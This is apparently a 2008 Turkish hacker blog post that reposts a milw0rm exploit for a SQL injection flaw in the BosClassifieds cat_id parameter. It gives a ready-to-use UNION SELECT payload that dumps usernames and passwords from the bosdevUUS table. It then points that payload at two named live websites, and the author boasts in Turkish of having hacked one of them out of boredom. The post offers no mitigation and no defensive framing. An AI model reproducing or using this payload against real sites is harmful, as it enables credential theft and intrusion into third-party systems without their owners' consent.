BosDev BosClassifieds (cat_id) SQL Injection Vulnerability

3 Kasım 2008 Pazartesi

BosDev BosClassifieds (cat_id) SQL Injection Vulnerability

BosDev BosClassifieds (cat_id) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6962

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/index.php?cat_id=[SQL]

[SQL]=

-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

example 1: ( you must look title )

http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )

example 2: ( you must look title )

http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

ZoRLu | ZRL | Buffer Overflow

3 Kasım 2008 Pazartesi

BosDev BosClassifieds (cat_id) SQL Injection Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com